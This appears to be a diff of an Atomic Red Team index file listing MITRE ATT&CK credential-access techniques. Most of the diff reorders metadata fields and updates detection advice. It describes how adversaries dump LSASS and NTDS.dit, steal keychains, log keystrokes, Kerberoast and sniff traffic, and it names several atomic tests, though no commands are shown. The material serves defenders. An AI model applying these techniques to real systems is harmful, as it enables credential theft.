x_mitre_detection: Monitor processes for applications that can be used to query
the Registry, such as [Reg](https://attack.mitre.org/software/S0075), and
collect command parameters that may indicate credentials are being searched.
Correlate activity with related suspicious behavior that may indicate an active
intrusion to reduce false positives.
- x_mitre_permissions_required:
- - Administrator
- - User
- x_mitre_system_requirements:
- - Ability to query some Registry locations depends on the adversary's level
- of access. User permissions are usually limited to access of user-related
- Registry keys.
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - Process monitoring
+ - Windows Registry
+ x_mitre_contributors:
+ - Sudhanshu Chauhan, @Sudhanshu_C
+ x_mitre_platforms:
+ - Windows
identifier: T1552.002
atomic_tests:
- name: Enumeration for Credentials in Registry
@@ -16778,20 +17070,20 @@ credential-access:
phase_name: credential-access
modified: '2020-03-24T20:46:23.547Z'
created: '2020-02-11T18:45:34.293Z'
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_contributors:
+ - Vincent Le Toux
+ x_mitre_data_sources:
+ - Windows event logs
+ x_mitre_permissions_required:
+ - Administrator
x_mitre_detection: |-
Monitor domain controller logs for replication requests and other unscheduled activity possibly associated with DCSync.(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) Also monitor for network protocols(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft NRPC Dec 2017) and other replication requests(Citation: Microsoft SAMR) from IPs not associated with known domain controllers.(Citation: AdSecurity DCSync Sept 2015)
Note: Domain controllers may not log replication requests originating from the default domain controller account.(Citation: Harmj0y DCSync Sept 2015)
- x_mitre_permissions_required:
- - Administrator
- x_mitre_data_sources:
- - Windows event logs
- x_mitre_contributors:
- - Vincent Le Toux
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
T1556.001:
technique:
@@ -16832,10 +17124,12 @@ credential-access:
phase_name: defense-evasion
modified: '2020-03-25T20:51:30.829Z'
created: '2020-02-11T19:05:02.399Z'
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Authentication logs
+ - API monitoring
+ - DLL monitoring
+ x_mitre_permissions_required:
+ - Administrator
x_mitre_detection: "Monitor for calls to OpenProcess that can be
used to manipulate lsass.exe running on a domain controller as well as for
malicious modifications to functions exported from authentication-related
@@ -16850,12 +17144,10 @@ credential-access:
used to execute binaries on a remote system as a particular account. Correlate
other security systems with login information (e.g. a user has an active login
session but has not entered the building or does not have VPN access). "
- x_mitre_permissions_required:
- - Administrator
- x_mitre_data_sources:
- - Authentication logs
- - API monitoring
- - DLL monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
T1212:
technique:
@@ -16894,26 +17186,26 @@ credential-access:
phase_name: credential-access
modified: '2020-03-25T18:51:01.070Z'
created: '2018-04-18T17:59:24.739Z'
- x_mitre_version: '1.1'
- x_mitre_contributors:
- - John Lambert, Microsoft Threat Intelligence Center
- x_mitre_data_sources:
- - Authentication logs
- - Windows Error Reporting
- - Process monitoring
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - Windows
+ - macOS
+ x_mitre_permissions_required:
+ - User
x_mitre_detection: Detecting software exploitation may be difficult depending
on the tools available. Software exploits may not always succeed or may cause
the exploited process to become unstable or crash. Also look for behavior
on the system that might indicate successful compromise, such as abnormal
behavior of processes. Credential resources obtained through exploitation
may be detectable in use if they are not normally used or seen.
- x_mitre_permissions_required:
- - User
- x_mitre_platforms:
- - Linux
- - Windows
- - macOS
- x_mitre_is_subtechnique: false
+ x_mitre_data_sources:
+ - Authentication logs
+ - Windows Error Reporting
+ - Process monitoring
+ x_mitre_contributors:
+ - John Lambert, Microsoft Threat Intelligence Center
+ x_mitre_version: '1.1'
atomic_tests: []
T1187:
technique:
@@ -16958,8 +17250,8 @@ credential-access:
21, 2017.
source_name: Cylance Redirect to SMB
- url: https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/
- description: Malith, O. (2017, March 24). Places of Interest in Stealing NetNTLM
- Hashes. Retrieved January 26, 2018.
+ description: Osanda Malith Jayathissa. (2017, March 24). Places of Interest
+ in Stealing NetNTLM Hashes. Retrieved January 26, 2018.
source_name: Osanda Stealing NetNTLM Hashes
- url: https://www.us-cert.gov/ncas/alerts/TA17-293A
description: 'US-CERT. (2017, October 20). Alert (TA17-293A): Advanced Persistent
@@ -16972,26 +17264,26 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
- modified: '2020-03-25T20:32:05.842Z'
+ modified: '2020-06-19T17:16:41.470Z'
created: '2018-01-16T16:13:52.465Z'
- x_mitre_version: '1.2'
- x_mitre_contributors:
- - Teodor Cimpoesu
- - Sudhanshu Chauhan, @Sudhanshu_C
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: |-
+ Monitor for SMB traffic on TCP ports 139, 445 and UDP port 137 and WebDAV traffic attempting to exit the network to unknown external systems. If attempts are detected, then investigate endpoint data sources to find the root cause. For internal traffic, monitor the workstation-to-workstation unusual (vs. baseline) SMB traffic. For many networks there should not be any, but it depends on how systems on the network are configured and where resources are located.
+
+ Monitor creation and modification of .LNK, .SCF, or any other files on systems and within virtual environments that contain resources that point to external network resources as these could be used to gather credentials when the files are rendered. (Citation: US-CERT APT Energy Oct 2017)
x_mitre_data_sources:
- File monitoring
- Network protocol analysis
- Network device logs
- Process use of network
- x_mitre_detection: |-
- Monitor for SMB traffic on TCP ports 139, 445 and UDP port 137 and WebDAV traffic attempting to exit the network to unknown external systems. If attempts are detected, then investigate endpoint data sources to find the root cause. For internal traffic, monitor the workstation-to-workstation unusual (vs. baseline) SMB traffic. For many networks there should not be any, but it depends on how systems on the network are configured and where resources are located.
-
- Monitor creation and modification of .LNK, .SCF, or any other files on systems and within virtual environments that contain resources that point to external network resources as these could be used to gather credentials when the files are rendered. (Citation: US-CERT APT Energy Oct 2017)
- x_mitre_permissions_required:
- - User
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: false
+ x_mitre_contributors:
+ - Teodor Cimpoesu
+ - Sudhanshu Chauhan, @Sudhanshu_C
+ x_mitre_version: '1.2'
atomic_tests: []
T1056.002:
technique:
@@ -17045,24 +17337,24 @@ credential-access:
phase_name: credential-access
modified: '2020-03-24T20:56:14.853Z'
created: '2020-02-11T18:58:45.908Z'
- x_mitre_platforms:
- - macOS
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_detection: |-
- Monitor process execution for unusual programs as well as malicious instances of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) that could be used to prompt users for credentials.
-
- Inspect and scrutinize input prompts for indicators of illegitimacy, such as non-traditional banners, text, timing, and/or sources.
- x_mitre_permissions_required:
- - User
+ x_mitre_contributors:
+ - Matthew Molyett, @s1air, Cisco Talos
x_mitre_data_sources:
- PowerShell logs
- User interface
- Process command-line parameters
- Process monitoring
- x_mitre_contributors:
- - Matthew Molyett, @s1air, Cisco Talos
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: |-
+ Monitor process execution for unusual programs as well as malicious instances of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) that could be used to prompt users for credentials.
+
+ Inspect and scrutinize input prompts for indicators of illegitimacy, such as non-traditional banners, text, timing, and/or sources.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - macOS
+ - Windows
identifier: T1056.002
atomic_tests:
- name: AppleScript - Prompt User for Password
@@ -17153,10 +17445,11 @@ credential-access:
phase_name: credential-access
modified: '2020-03-31T12:59:10.840Z'
created: '2020-02-11T19:13:33.643Z'
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Authentication logs
+ - Windows event logs
+ x_mitre_permissions_required:
+ - User
x_mitre_detection: "Monitor for anomalous Kerberos activity, such as malformed
or blank fields in Windows logon/logoff events (Event ID 4624, 4672, 4634),
RC4 encryption within TGTs, and TGS requests without preceding TGT requests.(Citation:
@@ -17165,11 +17458,10 @@ credential-access:
that differ from the default domain duration.(Citation: Microsoft Kerberos
Golden Ticket)\n\nMonitor for indications of [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003)
being used to move laterally. \n"
- x_mitre_permissions_required:
- - User
- x_mitre_data_sources:
- - Authentication logs
- - Windows event logs
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
T1552.006:
technique:
@@ -17214,21 +17506,21 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
- modified: '2020-03-31T12:53:56.361Z'
+ modified: '2020-06-17T14:25:38.082Z'
created: '2020-02-11T18:43:06.253Z'
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ x_mitre_permissions_required:
+ - User
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - Windows event logs
x_mitre_detection: "Monitor for attempts to access SYSVOL that involve searching
for XML files. \n\nDeploy a new XML file with permissions set to Everyone:Deny
and monitor for Access Denied errors.(Citation: ADSecurity Finding Passwords
in SYSVOL)"
- x_mitre_data_sources:
- - Process command-line parameters
- - Windows event logs
- x_mitre_permissions_required:
- - User
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
identifier: T1552.006
atomic_tests:
- name: GPP Passwords (findstr)
@@ -17322,22 +17614,9 @@ credential-access:
phase_name: credential-access
modified: '2020-03-24T21:29:13.900Z'
created: '2017-05-31T21:30:48.323Z'
- x_mitre_is_subtechnique: false
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- - root
- - User
- x_mitre_detection: 'Detection may vary depending on how input is captured but
- may include monitoring for certain Windows API calls (e.g. `SetWindowsHook`,
- `GetKeyState`, and `GetAsyncKeyState`)(Citation: Adventures of a Keystroke),
- monitoring for malicious instances of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059),
- and ensuring no unauthorized drivers or kernel modules that could indicate
- keylogging or API hooking are present.'
+ x_mitre_version: '1.1'
+ x_mitre_contributors:
+ - John Lambert, Microsoft Threat Intelligence Center
x_mitre_data_sources:
- Windows Registry
- Windows event logs
@@ -17350,9 +17629,22 @@ credential-access:
- DLL monitoring
- Binary file metadata
- API monitoring
- x_mitre_contributors:
- - John Lambert, Microsoft Threat Intelligence Center
- x_mitre_version: '1.1'
+ x_mitre_detection: 'Detection may vary depending on how input is captured but
+ may include monitoring for certain Windows API calls (e.g. `SetWindowsHook`,
+ `GetKeyState`, and `GetAsyncKeyState`)(Citation: Adventures of a Keystroke),
+ monitoring for malicious instances of [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059),
+ and ensuring no unauthorized drivers or kernel modules that could indicate
+ keylogging or API hooking are present.'
+ x_mitre_permissions_required:
+ - Administrator
+ - SYSTEM
+ - root
+ - User
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_is_subtechnique: false
atomic_tests: []
T1558.003:
technique:
@@ -17424,23 +17716,23 @@ credential-access:
phase_name: credential-access
modified: '2020-02-27T18:25:30.124Z'
created: '2020-02-11T18:43:38.588Z'
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_platforms:
- - Windows
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_data_sources:
+ - Authentication logs
+ - Windows event logs
+ x_mitre_system_requirements:
+ - Valid domain account or the ability to sniff traffic within a domain
x_mitre_detection: 'Enable Audit Kerberos Service Ticket Operations to log Kerberos
TGS service ticket requests. Particularly investigate irregular patterns of
activity (ex: accounts making numerous requests, Event ID 4769, within a small
time frame, especially if they also request RC4 encryption [Type 0x17]).(Citation:
Microsoft Detecting Kerberoasting Feb 2018)(Citation: AdSecurity Cracking
Kerberos Dec 2015)'
- x_mitre_system_requirements:
- - Valid domain account or the ability to sniff traffic within a domain
- x_mitre_data_sources:
- - Authentication logs
- - Windows event logs
- x_mitre_contributors:
- - Praetorian
+ x_mitre_platforms:
+ - Windows
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
identifier: T1558.003
atomic_tests:
- name: Request for service tickets
@@ -17461,6 +17753,12 @@ credential-access:
name: powershell
T1555.001:
technique:
+ created: '2020-02-12T18:55:24.728Z'
+ modified: '2020-02-17T13:14:31.140Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ type: attack-pattern
id: attack-pattern--1eaebf46-e361-4437-bc23-d5d65a3b92e3
description: |-
Adversaries may collect the keychain storage data from a system to acquire credentials. Keychains are the built-in way for macOS to keep track of users' passwords and credentials for many services and features such as WiFi passwords, websites, secure notes, certificates, and Kerberos. Keychain files are located in ~/Library/Keychains/,/Library/Keychains/, and /Network/Library/Keychains/. (Citation: Wikipedia keychain) The security command-line utility, which is built into macOS by default, provides a useful way to manage these credentials.
@@ -17481,28 +17779,22 @@ credential-access:
description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
DA, the OS X Way. Retrieved July 3, 2017.
source_name: External to DA, the OS X Way
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: credential-access
- modified: '2020-02-17T13:14:31.140Z'
- created: '2020-02-12T18:55:24.728Z'
+ x_mitre_platforms:
+ - macOS
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
+ x_mitre_detection: Unlocking the keychain and using passwords from it is a very
+ common process, so there is likely to be a lot of noise in any detection technique.
+ Monitoring of system calls to the keychain can help determine if there is
+ a suspicious process trying to access it.
+ x_mitre_permissions_required:
+ - Administrator
x_mitre_data_sources:
- PowerShell logs
- Process monitoring
- File monitoring
- System calls
- API monitoring
- x_mitre_permissions_required:
- - Administrator
- x_mitre_detection: Unlocking the keychain and using passwords from it is a very
- common process, so there is likely to be a lot of noise in any detection technique.
- Monitoring of system calls to the keychain can help determine if there is
- a suspicious process trying to access it.
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_platforms:
- - macOS
identifier: T1555.001
atomic_tests:
- name: Keychain
@@ -17534,6 +17826,20 @@ credential-access:
name: sh
T1056.001:
technique:
+ id: attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4
+ description: |-
+ Adversaries may log user keystrokes to intercept credentials as the user types them. Keylogging is likely to be used to acquire credentials for new access opportunities when [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) efforts are not effective, and may require an adversary to intercept keystrokes on a system for a substantial period of time before credentials can be successfully captured.
+
+ Keylogging is the most prevalent type of input capture, with many different ways of intercepting keystrokes.(Citation: Adventures of a Keystroke) Some methods include:
+
+ * Hooking API callbacks used for processing keystrokes. Unlike [Credential API Hooking](https://attack.mitre.org/techniques/T1056/004), this focuses solely on API functions intended for processing keystroke data.
+ * Reading raw keystroke data from the hardware buffer.
+ * Windows Registry modifications.
+ * Custom drivers.
+ name: Keylogging
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1056.001
@@ -17545,20 +17851,6 @@ credential-access:
description: 'Tinaztepe, E. (n.d.). The Adventures of a Keystroke: An in-depth
look into keyloggers on Windows. Retrieved April 27, 2016.'
source_name: Adventures of a Keystroke
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Keylogging
- description: |-
- Adversaries may log user keystrokes to intercept credentials as the user types them. Keylogging is likely to be used to acquire credentials for new access opportunities when [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) efforts are not effective, and may require an adversary to intercept keystrokes on a system for a substantial period of time before credentials can be successfully captured.
-
- Keylogging is the most prevalent type of input capture, with many different ways of intercepting keystrokes.(Citation: Adventures of a Keystroke) Some methods include:
-
- * Hooking API callbacks used for processing keystrokes. Unlike [Credential API Hooking](https://attack.mitre.org/techniques/T1056/004), this focuses solely on API functions intended for processing keystroke data.
- * Reading raw keystroke data from the hardware buffer.
- * Windows Registry modifications.
- * Custom drivers.
- id: attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -17699,26 +17991,26 @@ credential-access:
phase_name: collection
modified: '2020-03-31T13:54:08.239Z'
created: '2020-02-11T19:08:51.677Z'
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_contributors:
+ - Eric Kuehn, Secure Ideas
+ - Matthew Demaske, Adaptforward
+ x_mitre_data_sources:
+ - Windows event logs
+ - Windows Registry
+ - Packet capture
+ - Netflow/Enclave netflow
+ x_mitre_permissions_required:
+ - User
x_mitre_detection: |-
Monitor HKLM\Software\Policies\Microsoft\Windows NT\DNSClient for changes to the "EnableMulticast" DWORD value. A value of “0” indicates LLMNR is disabled. (Citation: Sternsecurity LLMNR-NBTNS)
Monitor for traffic on ports UDP 5355 and UDP 137 if LLMNR/NetBIOS is disabled by security policy.
Deploy an LLMNR/NBT-NS spoofing detection tool.(Citation: GitHub Conveigh) Monitoring of Windows event logs for event IDs 4697 and 7045 may help in detecting successful relay techniques.(Citation: Secure Ideas SMB Relay)
- x_mitre_permissions_required:
- - User
- x_mitre_data_sources:
- - Windows event logs
- - Windows Registry
- - Packet capture
- - Netflow/Enclave netflow
- x_mitre_contributors:
- - Eric Kuehn, Secure Ideas
- - Matthew Demaske, Adaptforward
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
T1003.004:
technique:
@@ -17760,12 +18052,12 @@ credential-access:
phase_name: credential-access
modified: '2020-03-24T20:35:42.440Z'
created: '2020-02-21T16:22:09.493Z'
- x_mitre_platforms:
- - Windows
- x_mitre_permissions_required:
- - SYSTEM
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_contributors:
+ - Ed Williams, Trustwave, SpiderLabs
+ x_mitre_data_sources:
+ - Process monitoring
+ - PowerShell logs
+ - Process command-line parameters
x_mitre_detection: 'Monitor processes and command-line arguments for program
execution that may be indicative of credential dumping. Remote access tools
may contain built-in features or incorporate existing tools like Mimikatz.
@@ -17773,12 +18065,12 @@ credential-access:
such as PowerSploit''s Invoke-Mimikatz module,(Citation: Powersploit) which
may require additional logging features to be configured in the operating
system to collect necessary information for analysis.'
- x_mitre_data_sources:
- - Process monitoring
- - PowerShell logs
- - Process command-line parameters
- x_mitre_contributors:
- - Ed Williams, Trustwave, SpiderLabs
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - SYSTEM
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
T1003.001:
technique:
@@ -17833,27 +18125,27 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
- modified: '2020-03-24T20:34:26.145Z'
+ modified: '2020-06-09T20:46:00.393Z'
created: '2020-02-11T18:41:44.783Z'
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_contributors:
+ - Ed Williams, Trustwave, SpiderLabs
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - PowerShell logs
+ - Process monitoring
+ x_mitre_permissions_required:
+ - Administrator
+ - SYSTEM
x_mitre_detection: |-
Monitor for unexpected processes interacting with LSASS.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as Mimikatz access LSASS.exe by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details are stored. Credential dumpers may also use methods for reflective [Process Injection](https://attack.mitre.org/techniques/T1055) to reduce potential indicators of malicious activity.
On Windows 8.1 and Windows Server 2012 R2, monitor Windows Logs for LSASS.exe creation to verify that LSASS started as a protected process.
Monitor processes and command-line arguments for program execution that may be indicative of credential dumping. Remote access tools may contain built-in features or incorporate existing tools like Mimikatz. PowerShell scripts also exist that contain credential dumping functionality, such as PowerSploit's Invoke-Mimikatz module,(Citation: Powersploit) which may require additional logging features to be configured in the operating system to collect necessary information for analysis.
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- x_mitre_data_sources:
- - Process command-line parameters
- - PowerShell logs
- - Process monitoring
- x_mitre_contributors:
- - Ed Williams, Trustwave, SpiderLabs
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
identifier: T1003.001
atomic_tests:
- name: Windows Credential Editor
@@ -18100,23 +18392,23 @@ credential-access:
phase_name: collection
modified: '2020-03-31T13:54:08.535Z'
created: '2020-02-11T19:07:12.114Z'
- x_mitre_platforms:
- - Windows
- - macOS
- - Linux
- x_mitre_is_subtechnique: false
- x_mitre_version: '1.0'
- x_mitre_permissions_required:
- - User
+ x_mitre_contributors:
+ - Daniil Yugoslavskiy, @yugoslavskiy, Atomic Threat Coverage project
+ x_mitre_detection: Monitor network traffic for anomalies associated with known
+ MiTM behavior. Consider monitoring for modifications to system configuration
+ files involved in shaping network traffic flow.
x_mitre_data_sources:
- File monitoring
- Netflow/Enclave netflow
- Packet capture
- x_mitre_detection: Monitor network traffic for anomalies associated with known
- MiTM behavior. Consider monitoring for modifications to system configuration
- files involved in shaping network traffic flow.
- x_mitre_contributors:
- - Daniil Yugoslavskiy, @yugoslavskiy, Atomic Threat Coverage project
+ x_mitre_permissions_required:
+ - User
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
atomic_tests: []
T1556:
technique:
@@ -18143,7 +18435,8 @@ credential-access:
description: "Adversaries may modify authentication mechanisms and processes
to access user credentials or enable otherwise unwarranted access to accounts.
The authentication process is handled by mechanisms, such as the Local Security
- Authentication Server (LSASS) process and the Security Accounts Manager (SAM),
+ Authentication Server (LSASS) process and the Security Accounts Manager (SAM)
+ on Windows or pluggable authentication modules (PAM) on Unix-based systems,
responsible for gathering, storing, and validating credentials. \n\nAdversaries
may maliciously modify a part of this process to either reveal credentials
or bypass authentication mechanisms. Compromised credentials or access may
@@ -18158,12 +18451,15 @@ credential-access:
phase_name: credential-access
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-25T20:59:05.357Z'
+ modified: '2020-07-13T21:23:01.762Z'
created: '2020-02-11T19:01:56.887Z'
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: false
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - File monitoring
+ - Authentication logs
+ - API monitoring
+ - Windows Registry
+ - Process monitoring
+ - DLL monitoring
x_mitre_detection: "Monitor for new, unfamiliar DLL files written to a domain
controller and/or local computer. Monitor for changes to Registry entries
for password filters (ex: HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Notification
@@ -18173,26 +18469,34 @@ credential-access:
for calls to OpenProcess that can be used to manipulate lsass.exe
running on a domain controller as well as for malicious modifications to functions
exported from authentication-related system DLLs (such as cryptdll.dll and
- samsrv.dll).(Citation: Dell Skeleton) \n\nConfigure robust, consistent account
- activity audit policies across the enterprise and with externally accessible
- services. (Citation: TechNet Audit Policy) Look for suspicious account behavior
- across systems that share accounts, either user, admin, or service accounts.
- Examples: one account logged into multiple systems simultaneously; multiple
- accounts logged into the same machine simultaneously; accounts logged in at
- odd times or outside of business hours. Activity may be from interactive login
- sessions or process ownership from accounts being used to execute binaries
- on a remote system as a particular account. Correlate other security systems
- with login information (e.g., a user has an active login session but has not
- entered the building or does not have VPN access)."
- x_mitre_data_sources:
- - Authentication logs
- - API monitoring
- - Windows Registry
- - Process monitoring
- - DLL monitoring
+ samsrv.dll).(Citation: Dell Skeleton) \n\nMonitor PAM configuration and module
+ paths (ex: /etc/pam.d/) for changes. Use system-integrity tools
+ such as AIDE and monitoring tools such as auditd to monitor PAM files.\n\nConfigure
+ robust, consistent account activity audit policies across the enterprise and
+ with externally accessible services. (Citation: TechNet Audit Policy) Look
+ for suspicious account behavior across systems that share accounts, either
+ user, admin, or service accounts. Examples: one account logged into multiple
+ systems simultaneously; multiple accounts logged into the same machine simultaneously;
+ accounts logged in at odd times or outside of business hours. Activity may
+ be from interactive login sessions or process ownership from accounts being
+ used to execute binaries on a remote system as a particular account. Correlate
+ other security systems with login information (e.g., a user has an active
+ login session but has not entered the building or does not have VPN access)."
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - Linux
+ - macOS
atomic_tests: []
T1003.003:
technique:
+ created: '2020-02-11T18:42:35.572Z'
+ modified: '2020-03-24T20:39:39.949Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ type: attack-pattern
id: attack-pattern--edf91964-b26e-4b4a-9600-ccacd7d7df24
description: |
Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights. By default, the NTDS file (NTDS.dit) is located in %SystemRoot%\NTDS\Ntds.dit of a domain controller.(Citation: Wikipedia Active Directory)
@@ -18222,30 +18526,24 @@ credential-access:
to Implant Skeleton Key on Domain Controllers & BackDoor Your Active Directory
Forest. Retrieved February 3, 2015.
source_name: Metcalf 2015
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: credential-access
- modified: '2020-03-24T20:39:39.949Z'
- created: '2020-02-11T18:42:35.572Z'
- x_mitre_contributors:
- - Ed Williams, Trustwave, SpiderLabs
- x_mitre_detection: Monitor processes and command-line arguments for program
- execution that may be indicative of credential dumping, especially attempts
- to access or copy the NTDS.dit.
- x_mitre_system_requirements:
- - Access to Domain Controller or backup
+ x_mitre_platforms:
+ - Windows
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
+ x_mitre_permissions_required:
+ - Administrator
x_mitre_data_sources:
- Windows event logs
- Process command-line parameters
- PowerShell logs
- Process monitoring
- x_mitre_permissions_required:
- - Administrator
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_platforms:
- - Windows
+ x_mitre_system_requirements:
+ - Access to Domain Controller or backup
+ x_mitre_detection: Monitor processes and command-line arguments for program
+ execution that may be indicative of credential dumping, especially attempts
+ to access or copy the NTDS.dit.
+ x_mitre_contributors:
+ - Ed Williams, Trustwave, SpiderLabs
identifier: T1003.003
atomic_tests:
- name: Create Volume Shadow Copy with NTDS.dit
@@ -18417,15 +18715,16 @@ credential-access:
elevation_required: true
T1040:
technique:
- id: attack-pattern--3257eb21-f9a7-4430-8de1-d8b6e288f529
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Network Sniffing
- description: |-
- Adversaries may sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
-
- Data captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol. Techniques for name service resolution poisoning, such as [LLMNR/NBT-NS Poisoning and SMB Relay](https://attack.mitre.org/techniques/T1557/001), can also be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary.
-
- Network sniffing may also reveal configuration details, such as running services, version numbers, and other network characteristics (e.g. IP addresses, hostnames, VLAN IDs) necessary for subsequent Lateral Movement and/or Defense Evasion activities.
+ created: '2017-05-31T21:30:41.399Z'
+ modified: '2020-03-25T21:03:49.610Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ - kill_chain_name: mitre-attack
+ phase_name: discovery
+ type: attack-pattern
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1040
@@ -18433,16 +18732,15 @@ credential-access:
- external_id: CAPEC-158
source_name: capec
url: https://capec.mitre.org/data/definitions/158.html
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: credential-access
- - kill_chain_name: mitre-attack
- phase_name: discovery
- modified: '2020-03-25T21:03:49.610Z'
- created: '2017-05-31T21:30:41.399Z'
+ description: |-
+ Adversaries may sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
+
+ Data captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol. Techniques for name service resolution poisoning, such as [LLMNR/NBT-NS Poisoning and SMB Relay](https://attack.mitre.org/techniques/T1557/001), can also be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary.
+
+ Network sniffing may also reveal configuration details, such as running services, version numbers, and other network characteristics (e.g. IP addresses, hostnames, VLAN IDs) necessary for subsequent Lateral Movement and/or Defense Evasion activities.
+ name: Network Sniffing
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ id: attack-pattern--3257eb21-f9a7-4430-8de1-d8b6e288f529
x_mitre_version: '1.1'
